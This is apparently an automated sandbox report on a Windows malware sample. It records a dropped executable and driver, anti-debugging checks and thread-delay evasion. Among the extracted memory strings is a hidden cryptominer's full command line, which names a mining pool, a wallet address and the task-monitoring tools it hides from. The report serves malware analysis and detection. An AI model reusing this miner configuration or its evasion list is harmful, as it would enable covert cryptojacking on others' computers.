Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: conhost.exe, 0000001A.00000002.3410809736.0000010D5408C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001A.00000002.3410809736.0000010D5407D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: conhost.exe, 0000001A.00000002.3410809736.0000010D53FF7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CONHOST.EXE--ALGO=RX/0--URL=POOL.HASHVAULT.PRO:3333--USER=4AGH8ZKEBTMI6NAKN8KYTBECUAWOWBAJKJ6VEDXZMSIPJTKYWTF1HHADAFJN39JTRSXIPBHSSZQNT2U1JYCPSAEDMHFT2QQ--PASS=--CPU-MAX-THREADS-HINT=80--CINIT-WINRING=GTEBVDARARZG.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-VERSION=3.4.0--CINIT-ID=URMTBCJNGPPIBWNAXX
Source: conhost.exe, 0000001A.00000002.3410809736.0000010D53FF7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
Source: conhost.exe, 0000001A.00000003.2251425628.0000010D54012000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEURMTBCJNGPPIBWNA
Source: conhost.exe, 0000001A.00000002.3410809736.0000010D53FF7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --ALGO=RX/0 --URL=POOL.HASHVAULT.PRO:3333 --USER="4AGH8ZKEBTMI6NAKN8KYTBECUAWOWBAJKJ6VEDXZMSIPJTKYWTF1HHADAFJN39JTRSXIPBHSSZQNT2U1JYCPSAEDMHFT2QQ" --PASS="" --CPU-MAX-THREADS-HINT=80 --CINIT-WINRING="GTEBVDARARZG.SYS" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-VERSION="3.4.0" --CINIT-ID="URMTBCJNGPPIBWNA"
Source: conhost.exe, 0000001A.00000002.3410809736.0000010D5407D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXEIZ.EXEXEDE2EP.
Source: conhost.exe, 0000001A.00000002.3410809736.0000010D5408C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001A.00000003.2251425628.0000010D54012000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001A.00000002.3410809736.0000010D53FF7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
Source: conhost.exe, 0000001A.00000002.3410809736.0000010D5408C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXEERYSYSTEMB7

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4196	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5583	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7127
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2430

Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe

Dropped PE file which has not been started: C:\Windows\Temp\gtebvdararzg.sys

Jump to dropped file

Source: C:\Windows\System32\conhost.exe

API coverage: 1.1 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960	Thread sleep count: 4196 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960	Thread sleep count: 5583 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2656	Thread sleep count: 7127 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4560	Thread sleep count: 2430 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4200	Thread sleep time: -4611686018427385s >= -30000s

Source: C:\Windows\System32\conhost.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: conhost.exe, 0000001A.00000002.3410809736.0000010D54011000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW^\|
Source: nlkuzmdacjrb.exe	Binary or memory string: dw/NyAnZto7sTE0PC19LNmoMCo/IMEsHOcwIjw2eXWeaT83ICeAwrYFMTQ8LYjIM+YwKj8gFddesTAiPDaMNwFGPzcgJ2N3UWMxNDwtc03BpDAqPyBxyUX/MCI8Nmk1V0g/NyAnNZd22jE0PC1v7Z7UMCo/IIC0TMQwIjw2ylrIJT83ICcpcIQoMTQ8LYvsaR8wKj8gPCWJgjAiPDZBEiB1PzcgJw+PmtwxNDwty+UpwjAqPyAkiLRVMCI8NpEPxHo/N
Source: nlkuzmdacjrb.exe	Binary or memory string: DXr5DnNicQ0Ec5malpu5zj0X1cvE43PZQVmr+Y0aN0ft2M7lPDmFUFJIXRzLkY6Jm4V1llJM586s9oD9P+ACx62WRYlR2yYIwOXmh4j8ibvat4+QtJzsyFE1vQYkklZjbsPkgqDRfnTYKAmSa1F/qxtOjJDb6w0AuXWRsTXS82WGeWyL5FrlFm+8zJqV9/vmciF0RRev2X6uUmS8XHYUc3auyRX0DizG7BoZNwmULhPrhY+QlCCr1EvX6GEB6FN5j3Ps
Source: conhost.exe, 0000001A.00000002.3410809736.0000010D54011000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001A.00000002.3410809736.0000010D53FC9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: nlkuzmdacjrb.exe	Binary or memory string: gBVmcIECxFTTQIjQqoF2lMU0JiXFlBJemetRIKRQFAdxJ2MpfnE0GABAIFWFFsZgQezILBH34a4gANRKB51whPOei4aVoPHR7qVYkAAlsZi+dvcqI5EsWaPbc/umhCBlzY9hprahI5C+Fd1jo39EjJxPggKAPWXb+53XwRhRAZ3hOGPjlzFTuUedjOxUtTBO7Htez6OXG65IO6+V88sCWRAxEcvRIaWn649EPHOUlGduRobFQWuf9oKWsApQwVEox1ZS
Source: nlkuzmdacjrb.exe	Binary or memory string: Vw1TTdePl29GWBqhXRibu38oMDy4VPT33r+uJFm60pEmXFD2RMjflMGYhXxbr6hcWaZryIuD2/FYNcYTeCgIZ4NYOZjZUqnm3DiT9pgIgIzJe70K0jmivpPSCkc+3VGcpS26KN9HAs5Jg3xbkw+Xjk4iuYhd/Xo1mcE7NKlKsFB9S6RU3qyL4myykwN0bVMcIY8bsnOiHMIbuvqmV2hZvsMsIdxPdRwzllBR/xSa4oFfCdu4Sa1Wzq6uH0Z63KVFPNnv
Source: nlkuzmdacjrb.exe	Binary or memory string: c42tl3IVq/2ixssW88Mk6qSa/+F30gSq8nrFvh0n4Hbj1e435d6Vg1YgX7QvxZoTeXXodtE4yL9kqMLjKI5iO08R5JDA9iA91eKKbKXB6fqKxZTe6Y6tt46ApVTV2p7ChTzLRRV7EkwxJ0iCRj+jxgGGbWWOR7ybpygfCmlyWf5EeNa3Wpq/8D2/3ro8ePRLmCpnHBQEmUvK7YpIZkkoYOpxgIsLVWC3Ni4kE+ATwdByTfHsG4ulC8i4MsUxXDDWbi14
Source: nlkuzmdacjrb.exe	Binary or memory string: NBR99Hfl3iMD9+3Rc/bJSWd4Z8JA7RdGaE50JWEhjjRwHGFS/J7MbYbgH+pEeSlJZ6ceK/c8D731xIvaZ0FmY2VwcHV4C4m+O88puFz4/0cS1rZrxpGsz27cv+ByCNTo8JmpZk474PJ4uJm4V5DLmqDr02fn2BeLVnRUVBKLli2bFSLzTHdzigFImbPPvb/zm3nUt1/5avHSc5Q2q9E4ucjInA+P18eDuAIFF+G6jIvlFhYFpoy1Q1n5H9iJGfhfRfyZ
Source: nlkuzmdacjrb.exe	Binary or memory string: H+VwYNik2ZKkZJm4HpoMyZ0JJZnEBTq2Mk+rmbS3+c1lgJCSaKIp0PXoOXklnHTNlEt07R5ZuljUpKPeHt7cXOmlqQaAn5g8c6kZZlraU02oMePUfE/WlfkFoE4qgyiZwUSLcOSIu2BBgFFnRHgfstrlFNES2dIFLYeJDAEXKLGscJn3jSHjOOwzw5Y6gXrZPw/xmVs2XLgvvIWR5o+kvQ1BMocCtbimDMk6TdwctYhDbeCBrKGQ+dXngZxdBExkVefD

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF72878D6F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF72878D6F0

Source: C:\Users\user\Desktop\file.exe

0_2_00007FF72877F4E0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000001BB8028FE28 mov eax, dword ptr fs:[00000030h]		0_2_000001BB8028FE28
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00000122A433FE28 mov eax, dword ptr fs:[00000030h]		18_2_00000122A433FE28

